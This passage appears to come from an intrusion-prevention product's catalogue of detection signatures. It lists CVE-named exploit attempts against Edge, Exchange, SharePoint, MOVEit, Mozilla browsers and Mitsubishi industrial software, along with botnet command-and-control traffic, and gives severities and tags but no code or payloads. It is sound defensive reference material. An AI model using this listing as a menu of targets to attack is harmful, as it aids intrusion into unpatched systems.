About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-03, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1143-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0639
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0769

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-03, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1143-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0769
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0773

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2019-03, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1143-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0773
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0829

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-04, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1149-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0829
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0911

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-05, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1159-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0911
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0989

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0989
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0991

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0991
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0992

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0992
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0993

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0993
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1003

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1003
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1024

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1024
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1051

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1051
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1139

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-08, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1181-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1139
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1140

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-08, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1181-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1140
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1141

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-08, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1181-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1141
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1195

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-08, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1181-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1195
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1196

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-08, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1181-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1196
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1197

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-08, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1181-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1197
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1307

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-10, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1195-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1307
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1308

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-10, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1195-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1308
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1366

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-10, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1195-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1366
Description:
Back to top

File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2020-1219

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2020-06, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1256-5242
Vulnerability: Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2020-1219
Description:
Back to top

File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0609

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-03, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1690-5242
Vulnerability: Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0609
Description:
Back to top

File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0806

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-04, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1149-5242
Vulnerability: Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0806
Description:
Back to top

File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0926

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-05, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1159-5242
Vulnerability: Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0926
Description:
Back to top

File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0940

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-05, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1159-5242
Vulnerability: Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0940
Description:
Back to top

File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-1052

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-06, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1168-5242
Vulnerability: Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-1052
Description:
Back to top

File-Text_Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-26857

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2021-03, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1327-5242
Last changed: sgpkg-ips-1327-5242
Vulnerability: Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-26857
Description:
Back to top

File-Text_Microsoft_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1367

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-09, CVE2019, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1191-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1367
Description:
Back to top

File-Text_Microsoft_Office_Directory_Traversal_Vulnerability_CVE-2019-0801

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2019-04, CVE2019, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1815-5242
Vulnerability: Microsoft_Office_Directory_Traversal_Vulnerability_CVE-2019-0801
Description:
Back to top

File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1380

About this situation: An attempt to exploit a vulnerability in Microsoft Scripting detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-08, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1269-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1380
Description:
Back to top

File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1570

About this situation: An attempt to exploit a vulnerability in Microsoft Scripting detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-08, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1269-5242
Last changed: sgpkg-ips-1269-5242
Vulnerability: Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1570
Description:
Back to top

File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2021-31959

About this situation: An attempt to exploit a vulnerability in Microsoft Scripting detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2021-06, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1356-5242
Last changed: sgpkg-ips-1356-5242
Vulnerability: Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2021-31959
Description:
Back to top

File-Text_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1257

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2019-09, CVE2019, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1187-5242
Last changed: sgpkg-ips-1187-5242
Vulnerability: Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1257
Description:
Back to top

File-Text_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1296

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2019-09, CVE2019, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1187-5242
Last changed: sgpkg-ips-1187-5242
Vulnerability: Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1296
Description:
Back to top

File-Text_Mime-Formatted-Request-Vulnerability-CVE-2011-1894

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-06, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Mime-Formatted-Request-Vulnerability-CVE-2011-1894
Description:
Back to top

File-Text_Mini-Stream-Ripper-Buffer-Overflow

About this situation: An attempt to exploit a Mini-Stream Ripper Buffer Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, Mini-Stream Ripper, CVE2009, Windows XP not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Mini-Stream-Ripper-Buffer-Overflow
Description:
Back to top

File-Text_MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432

About this situation: An attempt to exploit a vulnerability in MinIO detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MinIO, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1825-5242
Vulnerability: MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432
Description:
Back to top

File-Text_mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in mIRC detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, mIRC, CVE2003, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow
Description:
Back to top

File-Text_mIRC-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in mIRC detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, mIRC, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Vulnerability: mIRC-URI-Handler-Remote-Code-Execution
Description:
Back to top

File-Text_Mirth-Connect-Remote-Code-Execution-CVE-2023-43208

About this situation: An attempt to exploit a vulnerability in Mirth Connect detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mirth Connect, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Vulnerability: Mirth-Connect-Remote-Code-Execution-CVE-2023-43208
Description:
Back to top

File-Text_Mitsubishi-Electric-E-Designer-Becomlislave-Status_Bit-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Mitsubishi Electric E-Designer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mitsubishi Electric E-Designer, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-975-5242
Vulnerability: Mitsubishi-Electric-E-Designer-Becomlislave-Status_Bit-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Mitsubishi-Electric-E-Designer-Setupalarm-Font-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Mitsubishi Electric E-Designer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mitsubishi Electric E-Designer, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Mitsubishi-Electric-E-Designer-Setupalarm-Font-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Mitsubishi-MC-WorkX-8.02-ActiveX-Control-Vulnerability

About this situation: An attempt to exploit a vulnerability in Mitsubishi MC-WorkX 8.02 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mitsubishi MC-WorkX 8.02, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Mitsubishi-MC-WorkX-8.02-ActiveX-Control-Vulnerability
Description:
Back to top

File-Text_Mitsubishi-MX-ActiveX-Control-ActUWzd.dll-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Mitsubishi MX detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mitsubishi MX, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Mitsubishi-MX-ActiveX-Control-ActUWzd.dll-Buffer-Overflow
Description:
Back to top

File-Text_Monkif-Bot-Traffic

About this situation: Monkif Bot traffic detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Monkif-Bot
Description:
Back to top

File-Text_MONSOON-CnC-Traffic

About this situation: A suspicious traffic pattern detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: MONSOON-Control-Traffic
Description:
Back to top

File-Text_MOVEit-Transfer-SQL-Injection-Post-Exploit

About this situation: An attempt to exploit a vulnerability in MOVEit detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MOVEit, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1597-5242
Last changed: sgpkg-ips-1600-5242
Vulnerability: MOVEit-Transfer-SQL-Injection-Post-Exploit
Description:
Back to top

File-Text_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Mozilla browsers detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution
Description:
Back to top

File-Text_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution-2

About this situation: An attempt to exploit a vulnerability in Mozilla browsers detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-1286-5242
Vulnerability: Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution
Description:
Back to top

File-Text_Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type

About this situation: Attempt to exploit code execution vulnerability in Mozilla browsers detected
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Netscape, Mozilla Firefox, Mozilla Suite, CVE2005, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type
Description:
Back to top

File-Text_Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption

About this situation: Detected an attempt to exploit a vulnerability in Mozilla Firefox and Seamonkey
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Command-Line-Url-Command-Execution

About this situation: Detects URLs that exploit Mozilla browser start-up script to execute shell commands
Context: Text File Stream
Severity: 7
Tags: HP-UX, Linux, Any Hardware, Mozilla based browsers, CVE2005, HP-UX not specific, Linux not specific, Mozilla based browsers not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: HTTP-Mozilla-Command-Line-Url-Command-Execution
Description:
Back to top

File-Text_Mozilla-CSS-Border-Memory-Corruption

About this situation: Detected an attempt to exploit a vulnerability in Mozilla
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Suite, Mozilla Thunderbird, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-CSS-Border-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-CSS-Moz-Binding-Cross-Site-Scripting

About this situation: Mozilla -moz-binding CSS property usage, possible XSS exploit
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2006, Windows not specific, Potential Disclosure
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Mozilla-CSS-Moz-Binding-Cross-Site-Scripting
Description:
Back to top

File-Text_Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, Mozilla Thunderbird, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1374-5242
Vulnerability: Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading
Description:
Back to top

File-Text_Mozilla-Firefox-Browser-Engine-Memory-Corruption

About this situation: Attempt to exploit a vulnerability in Mozilla Foundation Firefox
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Browser-Engine-Memory-Corruption
Description:
Back to top

File-Text_Mozilla-Firefox-Built-In-PDF-Viewer-Same-Origin-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-Built-In-PDF-Viewer-Same-Origin-Policy-Bypass
Description:
Back to top

File-Text_Mozilla-Firefox-Character-Processing-Cross-Site-Scripting-CVE-2008-4065

About this situation: An attempt exploit a vulnerability in Firefox detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-588-5211
Description:
Back to top

File-Text_Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass

About this situation: Exploit against privilege restriction bypass vulnerability in the handling of chrome pages in Mozilla Firefox
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass
Description:
Back to top

File-Text_Mozilla-Firefox-Chrome-URL-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox was detected
Context: Text File Stream
Severity: 7
